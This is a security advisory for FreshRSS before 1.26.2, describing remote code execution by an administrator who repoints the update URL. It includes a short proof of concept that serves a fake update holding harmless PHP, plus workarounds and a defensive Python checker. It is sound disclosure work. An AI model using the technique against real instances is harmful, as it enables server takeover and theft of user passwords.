Summary
In FreshRSS versions <1.26.2, an authenticated administrator user can execute arbitrary code on the FreshRSS server by modifying the update URL to one they control, and gain code execution after running an update.
Details
FreshRSS requests updates by making requests to <UPDATE_URL>/?v=<CURRENT_VERSION>, and the first line of the response indicates whether there is an update or not.
If you make a request to https://update.freshrss.org/?v=1.26.3 as of right now, you will receive NO_UPDATE 1.26.3
With https://update.freshrss.org/?v=1.26.2 you will get UPDATE 1.26.3 followed by <?php and PHP code that will be put into ./data/update.php and executed.
Patch / workarounds
Workarounds: touch ./data/update.php && chmod 000 ./data/update.php, or set disable_update to true in ./data/config.php.
Preferably update to version 1.26.2 or later.
Fixed as of #7477
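As an added defender-side example (not code from the FreshRSS project or from this advisory), the following Python parses an update response of the shape described above while treating everything after the status line as inert data, checks that the configured update URL points at the official host over HTTPS, and verifies that one of the two workarounds is in place. The host allowlist and the dict-shaped config are assumptions.

```python
"""Defender-side checks for the FreshRSS update flow (added example, not
FreshRSS code). Assumptions: the update-host allowlist below, and a config
passed in as a dict carrying a 'disable_update' key."""
import os
import stat
from urllib.parse import urlparse

# Assumption: only the official update host, over HTTPS, is acceptable.
OFFICIAL_UPDATE_HOSTS = {"update.freshrss.org"}

# Constructed sample with the shape of the advisory's PoC response.
CONSTRUCTED_ATTACK_RESPONSE = "UPDATE 1.123.0\n<?php\ndie('RCE');\n"


def parse_update_response(body):
    """Return (status, version, payload) for an update response.

    Only the first line is interpreted ('UPDATE <ver>' or 'NO_UPDATE <ver>');
    the rest comes back as an opaque string that is neither written to
    ./data/update.php nor executed, unlike the vulnerable flow."""
    first, _, rest = body.partition("\n")
    parts = first.strip().split()
    if len(parts) != 2 or parts[0] not in ("UPDATE", "NO_UPDATE"):
        raise ValueError("unexpected status line: %r" % first)
    return parts[0], parts[1], rest


def update_url_is_trusted(update_url):
    """Reject the attack precondition, an attacker-controlled update URL:
    require https and an allowlisted host (http://127.0.0.1:1337 fails)."""
    u = urlparse(update_url)
    return u.scheme == "https" and u.hostname in OFFICIAL_UPDATE_HOSTS


def update_php_mode(path):
    """Permission bits of data/update.php, or None if the file is absent."""
    try:
        return stat.S_IMODE(os.stat(path).st_mode)
    except FileNotFoundError:
        return None


def instance_is_hardened(config, mode):
    """True if one of the advisory's workarounds is in place: disable_update
    set to true, or update.php present with mode 000 (see update_php_mode)."""
    if config.get("disable_update") is True:
        return True
    return mode == 0
```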
PoC
Create a new file index.html in a new directory and put the following contents inside of it:
UPDATE 1.123.0
<?php
die('RCE');
Run a webserver: php -S 127.0.0.1:1337
Modify the update URL to http://127.0.0.1:1337 and run an update.
This will not work when FreshRSS is running inside a Docker container, for example, because it won't have the necessary file permissions to do so (updates are disabled inside the Docker images anyway, via the disable_update option in the config).
Impact
After successfully executing code, user data including hashed passwords can be exfiltrated, and the instance can be defaced when file permissions allow. Malicious code can be inserted into the instance to steal plaintext passwords, among other things.
Users that run FreshRSS inside Docker, have disabled updates / blocked update.php, or use git deployment are not affected.
Generally only users that use ZIP deployment are affected.